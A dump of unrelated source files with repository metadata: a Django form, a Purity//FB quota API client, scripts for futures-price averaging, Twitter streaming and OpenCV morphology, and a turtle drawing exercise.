3adf9934a74077c328b9a0afff37f8ca355eead1
|
/comicresizer/forms.py
|
a2f083f2fd6d9a8ab0f950d16e2e7b6010e34b3e
|
[] |
no_license
|
jgasteiz/comic-resizer
|
36671623fe9909f23fba793b44cf4ac56380926a
|
12d2e12efdf2017746d67a4b6d9616613ee58bb9
|
refs/heads/master
| 2021-07-05T05:56:00.911958
| 2017-09-27T07:43:58
| 2017-09-27T07:45:25
| 104,987,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
from django import forms
class ComicUploadForm(forms.Form):
file = forms.FileField(required=False)
|
[
"javi.manzano.oller@gmail.com"
] |
javi.manzano.oller@gmail.com
|
9e5d44f522f009d23699c1591c4e0874b753a458
|
74b978b712a5fa1645e7b7dcc9488a9a47a7a1b5
|
/blueprint/models.py
|
d4fb16656bfd02c446dbc1c4704c4fcfc26c8fbc
|
[] |
no_license
|
ikalchenko/blueprint
|
6a9653365c08651e997e0ee230e945d405746cb7
|
ab5c039fe2a1fce75266f17e00c867e2abd05e78
|
refs/heads/master
| 2020-05-21T18:55:43.272085
| 2019-05-20T19:21:32
| 2019-05-20T19:21:32
| 186,143,153
| 0
| 0
| null | 2019-05-20T19:21:34
| 2019-05-11T14:30:33
|
Python
|
UTF-8
|
Python
| false
| false
| 299
|
py
|
from .extensions import db
class BaseModel(db.Model):
id = db.Column(db.Integer, primary_key=True)
# date_created = db.Column(db.DateTime, server_default=db.func.now())
# date_modified = db.Column(db.DateTime, server_default=db.func.now())
async def serialize(self):
pass
|
[
"ikalchenko99@gmail.com"
] |
ikalchenko99@gmail.com
|
e770a09f01a41928a6a78f803955c09a6b3e83a7
|
33638679295dbe6bf1c9708fba570708afdc081b
|
/api/stablemanager/datalayer.py
|
5229c165c0ee079a4229b0c9b6270f1044727fe5
|
[
"Apache-2.0"
] |
permissive
|
toddg3s/wtfmanager
|
3317c252138d390766d3214ae6ccc472f0413d87
|
04fb30fb7de1a60a74e17b1254b5c2d3a7450b73
|
refs/heads/master
| 2021-08-31T22:45:12.444566
| 2017-12-23T06:55:33
| 2017-12-23T06:55:33
| 115,176,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
class DataProvider:
def get(self, datatype, dataid):
pass
def put(self, dataobject):
pass
def delete(self, dataobject):
pass
def query(self, datatype):
pass
def get_actions(self, from_date, to_date):
pass
def get_horse_schedules(self, horse_id):
pass
def get_horse_people(self, horse_id, person_type=None):
pass
class QuerySpec:
DataType = ''
_doquery = None
def __init__(self, datatype, doquery):
self.DataType = datatype
self._doquery = doquery
# Per-instance dicts: class-level dicts would be shared (and mutated)
# across every QuerySpec instance.
self.Filters = {}
self.Sorts = {}
def filter(self, prop, operator, value):
queryable = False
if prop == 'id':
queryable = True
elif self.DataType == 'schedule' and prop == 'horse_id':
queryable = True
elif self.DataType == 'association' and (prop == 'horse_id' or prop == 'person_id'):
queryable = True
elif self.DataType == 'action' and prop == 'horse_id':
queryable = True
self.Filters[prop] = (operator, value, queryable)
return self
def sort(self, prop, order='asc'):
self.Sorts[prop] = order
return self
def go(self):
return self._doquery(self)
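# Usage sketch (the do-query callable here is a stand-in; a real DataProvider
# would supply one that executes the spec against its backing store):
#
#   spec = QuerySpec('schedule', lambda s: [])
#   results = spec.filter('horse_id', '=', 42).sort('date').go()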
|
[
"todd@g3s.net"
] |
todd@g3s.net
|
94540c0cfc7509d41aeaeedc64a11096d5b2616a
|
81d955c3ac886e690ceb01026ed769b1784dbef9
|
/purity_fb/purity_fb_1dot8/apis/quotas_groups_api.py
|
665498e5f3f9ea81a3c569698b958f1cb115c367
|
[
"Apache-2.0"
] |
permissive
|
etsangsplk/purity_fb_python_client
|
bc525ef1a18f6a79c1536cb4519a7efd58d09d89
|
0807a0fa2eab273bc08f73266d9cda9fa33b37bd
|
refs/heads/master
| 2020-06-03T05:49:03.015147
| 2019-05-16T06:11:40
| 2019-05-16T06:11:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,547
|
py
|
# coding: utf-8
"""
Purity//FB REST Client
Client for Purity//FB REST API (1.0 - 1.8), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentation can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.8
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class QuotasGroupsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_group_quotas(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_group_quotas_with_http_info(**kwargs)
else:
(data) = self.create_group_quotas_with_http_info(**kwargs)
return data
def create_group_quotas_with_http_info(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_group_quotas(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_group_quotas_with_http_info(**kwargs)
else:
(data) = self.delete_group_quotas_with_http_info(**kwargs)
return data
def delete_group_quotas_with_http_info(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_group_quotas(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_group_quotas_with_http_info(**kwargs)
else:
(data) = self.list_group_quotas_with_http_info(**kwargs)
return data
def list_group_quotas_with_http_info(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'limit', 'sort', 'start', 'token', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_group_quotas(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_group_quotas_with_http_info(**kwargs)
else:
(data) = self.update_group_quotas_with_http_info(**kwargs)
return data
def update_group_quotas_with_http_info(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"azaria.zornberg@purestorage.com"
] |
azaria.zornberg@purestorage.com
|
bd46f51391adaab5845a6bb2c79fc3eaaea9933a
|
878ef94475b349e567f4cae860fc72fc10b98b37
|
/tests/test_src_introspection.py
|
44936aba966194503e6b4ce68c650a21b71cc7dc
|
[
"BSD-2-Clause"
] |
permissive
|
alexswerner/robotpkg_helpers
|
ec75180a748c5b0af3efed0762a66442469471f8
|
4cda66e8b9eeedc4dea9f5d4754595e2813a10ad
|
refs/heads/master
| 2021-05-19T13:34:59.518543
| 2020-04-03T01:22:05
| 2020-04-03T01:22:05
| 251,726,724
| 0
| 0
|
BSD-2-Clause
| 2020-03-31T20:43:00
| 2020-03-31T20:43:00
| null |
UTF-8
|
Python
| false
| false
| 1,005
|
py
|
#!/usr/bin/python3
from unittest import TestCase
from robotpkg_helpers import RobotpkgSrcIntrospection
from robotpkg_helpers import init_environment_variables
from robotpkg_helpers.utils import add_robotpkg_mng_variables
robotpkg_root='/integration_tests/robotpkg-test-rc'
#robotpkg_vars = add_robotpkg_mng_variables(robotpkg_root)
arpg_src_intros = RobotpkgSrcIntrospection(ROBOTPKG_ROOT_SRC=robotpkg_root+'/robotpkg')
add_robotpkg_mng_variables(arpg_src_intros)
init_environment_variables(arpg_src_intros,robotpkg_root)
arpg_src_intros.display()
arpg_src_intros.save('rpg_src_intros.json')
arpg_src_intros.package_dict['jrl-walkgen-v3'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['pinocchio'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['talos-simulation'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
|
[
"ostasse@laas.fr"
] |
ostasse@laas.fr
|
9e750f8075d60ec1bff5c0ffbb0d33f61c64a8dd
|
2b7cc7d56ee829213d0111f9c729997f708f9c66
|
/CreateDB/main.py
|
0bfe8ad211906988fffb8422edc8c842c6550f66
|
[] |
no_license
|
Vincentie/TreePrediction
|
69bb3e92afdd9c33070a18478b604d94feaf45bb
|
47d632c5701916a581964bf683d4551e0ededca4
|
refs/heads/master
| 2021-01-20T17:29:30.309974
| 2018-09-01T14:57:43
| 2018-09-01T14:57:43
| 90,878,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
__author__ = 'JianxuanLiu'
from parse_and_save_data import parse_and_save_data
from tradeDays import getTradeDays
from computeSentimentals import computeSentiments
import numpy as np
import pandas as pd
from datetime import datetime
from datetime import timedelta
import sqlite3
""" This main.py is performed to create a data table whose data can be picked to aplly a prediction tree.
Specifically, volume weighted average prices of different gold futures' prices and sentimental grades
processed by NLP methods are those data to be trained in a prediction tree model.
"""
def computeVWFactor(df, factor):
""" Computer a series of factors in a DataFrame using volume weighted avearge method.
"""
df = df.replace('', np.nan)
# fillna returns a new DataFrame, so the result must be assigned back
df = df.fillna(method='pad')
df = df.fillna(method='bfill')
df1 = df[['Volume']].astype(float)
df2 = df[[factor]].astype(float)
df2.columns = ['Volume']
vw = np.sum((df1 * df2)['Volume']) / np.sum(df1['Volume'])
return vw
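# Worked example (the numbers are made up): with volumes [2, 3] and closes
# [10.0, 20.0], the volume weighted average is
# (2*10.0 + 3*20.0) / (2 + 3) = 16.0:
#
#   demo = pd.DataFrame({'Volume': ['2', '3'], 'Close': ['10.0', '20.0']})
#   assert computeVWFactor(demo, 'Close') == 16.0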
if __name__ == '__main__':
beginDate = '2012-01-01'
endDate = '2017-01-01'
saveUrl1 = 'Data/FData.sqlite'
saveUrl2 = 'Data/Sentiments.sqlite'
"""Parse and save data"""
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_trade').parse_and_save_data()
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_sentiments').parse_and_save_data()
"""Obatain the trading data and sentimental grades of every day for future use."""
con = sqlite3.connect(saveUrl1)
sql = "SELECT * from SHFE"
data = pd.read_sql(sql, con)
avgdata = {}
sentiDict = computeSentiments(beginDate, endDate, saveUrl2).getSentiments()
"""Compute the volume weighted average factors and concatenate them with the sentimental grades."""
for date in getTradeDays(beginDate, endDate):
temp_df = data[data.date == date + ' ' + '00:00:00']
values = []
for item in ['Close', 'High', 'Low', 'Change2', 'ChangeofOpenInt']:
values.append(computeVWFactor(temp_df, item))
values.append(float(sum(temp_df['Volume']))) #Add the total trading volume to the values.
values.append(sentiDict[date]) #Add sentimental grades to the values.
key = date
avgdata.setdefault(key, values)
"""Insert the handled data into a new table."""
conna = sqlite3.connect('Data/FAvgData.sqlite')
cursor = conna.cursor()
SQLquery1 = "create table if not exists SHFEAvg(date datetime, Close numeric(15,2), High numeric(15,2), Low numeric(15,2),\
Change2 numeric(15,2), ChangeofOpenInt numeric(25,2), Volume numeric(15,2), Sentiment numeric(15,2) )"
cursor.execute(SQLquery1)
for key, value in avgdata.items():
iter = (key, value[0], value[1], value[2], value[3], value[4], value[5], value[6])
SQLquery2 = "insert into SHFEAvg" + " " + "values(?, ?, ?, ?, ?, ?, ?, ?)"
cursor.execute(SQLquery2, iter)
conna.commit()
conna.close()
|
[
"lavinho@hotmail.com"
] |
lavinho@hotmail.com
|
913a6ef26df5d59e656f52dc0d849452433fc3c5
|
1451a6fa3403a6b33c2adc31d94070ab16dca333
|
/avaliacao2/tweet_stream.py
|
9cfd7f240ef2a61b571df332ef38ba3e010927ef
|
[] |
no_license
|
lucaslioli/ufsm-deep-learning
|
b22a4ac5fa1604f04c9bd422b5b58f6e62577006
|
cf32547969d7ad7ad14235561df70a2a942ea9ec
|
refs/heads/master
| 2020-03-21T14:42:35.469428
| 2019-10-14T12:31:48
| 2019-10-14T12:31:48
| 138,671,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,784
|
py
|
import sys
import tweepy
import pickle as pkl
from authenticate import api_tokens
#override tweepy.StreamListener to add logic to on_status
class MyStreamListener(tweepy.StreamListener):
def on_status(self, status):
if(not status.retweeted and 'RT @' not in status.text[0:4] and status.lang == "pt"):
print("-----------------------------------------")
print("Lang:", status.lang)
print("Text:", status.text)
status.text = status.text.replace('\n', ' ').replace('\r', '')
record("unprocessed_tweets", status.text, status.id)
return True # Don't kill the stream
def on_error(self, status_code):
print('Encountered error with status code:', status_code)
print("-----------------------------------------")
return True # Don't kill the stream
def on_exception(self, exception):
print('Exception: ', exception)
print("-----------------------------------------")
return True # Don't kill the stream
def on_timeout(self, timeout):
print('Timeout: ', timeout)
print("-----------------------------------------")
return True # Don't kill the stream
# Start the Stream Listener
def start_stream():
print ("---------- STREAMING STARTED -----------")
while True:
try:
myStream = tweepy.streaming.Stream(auth, MyStreamListener())
myStream.filter(track=["a", "e", "i", "o", "u"], stall_warnings=True)
except ValueError as e:
print('ERROR: Exception occurred!', e)
print("-----------------------------------------")
continue
# Records the tweet ID and message into a file
def record(file_name, msg, id = ""):
# Using a txt file for testing purposes
with open("files/"+file_name+".txt", 'a') as f:
if(id != ""):
f.write(str(id) + " => " + msg + '\n')
else:
f.write(msg + '\n')
with open("files/"+file_name+".pkl", 'ab') as f:
pkl.dump(msg, f, pkl.HIGHEST_PROTOCOL)
# Records the tweet ID and message into a file
def record_array(file_name, arr):
# Using a txt file for testing purposes
with open("files/"+file_name+".txt", 'a') as f:
f.write(arr[0] + ", " + arr[1] + '\n')
with open("files/"+file_name+".pkl", 'ab') as f:
pkl.dump(arr, f, pkl.HIGHEST_PROTOCOL)
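# Reading one of these files back (sketch): each pkl.dump above appended a
# separate pickled object, so load repeatedly until EOFError:
#
#   with open("files/unprocessed_tweets.pkl", 'rb') as f:
#       while True:
#           try:
#               msg = pkl.load(f)
#           except EOFError:
#               break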
if __name__ == '__main__':
# Variables that contains the user credentials to access Twitter API
key = api_tokens()
# Tweepy API authentication
auth = tweepy.OAuthHandler(key['consumer_key'], key['consumer_secret'])
auth.set_access_token(key['access_token'], key['access_token_secret'])
# API authentication
api = tweepy.API(auth)
start_stream()
|
[
"loliveira@inf.ufsm.br"
] |
loliveira@inf.ufsm.br
|
746945952b0fab1f51ee929ad0f0cbeb6aad6a22
|
4fd90203c000cc4c15fc6d4538e9536f812af05a
|
/Chapter05/Erosion_Dilation.py
|
c59037f09ddb47686ea3c34fcf5f01d7aa86b049
|
[
"MIT"
] |
permissive
|
drabdkadir/GettingStartedwithPythonfortheInternetofThings
|
77487bbece9fd73ac7d5759d108686e6348dee66
|
86b57062879baaafd8a7ad332057359874bb3978
|
refs/heads/master
| 2020-12-06T15:41:03.055803
| 2019-02-19T10:09:20
| 2019-02-19T10:09:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
# Erosion and Dilation are Morphological Operations
# Erosion: Removes pixels at the boundaries of objects in an image
# Dilation: Adds pixels to the boundaries of objects in an image
# Import Computer Vision package - cv2
import cv2
# Import Numerical Python package - numpy as np
import numpy as np
# Read the image using imread built-in function
image = cv2.imread('image_4.jpg')
# Display original image using imshow built-in function
cv2.imshow("Original", image)
# Wait until any key is pressed
cv2.waitKey(0)
# np.ones returns an array, given shape and type, filled with ones
# np.ones(shape, dtype)
kernel = np.ones((5,5), dtype = "uint8")
# 5 x 5 is the dimension of the kernel
# uint8: is an unsigned integer (0 to 255)
# cv2.erode is the built-in function used for erosion
# cv2.erode(image, kernel, iterations)
erosion = cv2.erode(image, kernel, iterations = 1)
# Display image after erosion using imshow built-in function
cv2.imshow("Erosion", erosion)
# Wait until any key is pressed
cv2.waitKey(0)
# cv2.dilate is the built-in function used for dilation
# cv2.dilate(image, kernel, iterations)
dilation = cv2.dilate(image, kernel, iterations = 1)
# Display image after dilation using imshow built-in function
cv2.imshow("Dilation", dilation)
# Wait until any key is pressed
cv2.waitKey(0)
# Close all windows
cv2.destroyAllWindows()
|
[
"packtadrian@gmail.com"
] |
packtadrian@gmail.com
|
dfffaf1c880faeb1839261b33d4f3388ffc6080d
|
6a84e70184c2ea229a0db4f472426d7d585a1a4a
|
/turtle/lego_heads/head_c_while.py
|
74d373d3ad6ccfd35150faee6d67bf72d756765e
|
[] |
no_license
|
GBSL-Informatik/python-examples
|
5bcf89e255b05dac4a6b7e55efbbe144a2acc070
|
b0ac92a8ebda2cc665d0cc4a8f3d69f3ccfb211f
|
refs/heads/master
| 2023-01-02T15:28:27.863878
| 2020-11-01T21:00:19
| 2020-11-01T21:00:19
| 283,978,874
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
from gbsl_turtle import *
goto(-30, 0, draw=False)
counter = 0
while counter < 8:
forward(60)
left(45)
counter = counter + 1
goto(-30, 100, draw=False)
setheading(180) # orientation to the left: ◀️
counter = 0
while counter < 8:
forward(5)
right(45)
counter = counter + 1
goto(30, 100, draw=False)
setheading(0) # orientation to the right: ▶️
counter = 0
while counter < 8:
forward(5)
left(45)
counter = counter + 1
goto(-48, 40, draw=False)
setheading(-45) # orientation to the lower right: ↘️
counter = 0
while counter < 3:
forward(40)
left(45)
counter = counter + 1
done()
|
[
"lebalz@outlook.com"
] |
lebalz@outlook.com
|
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6
|
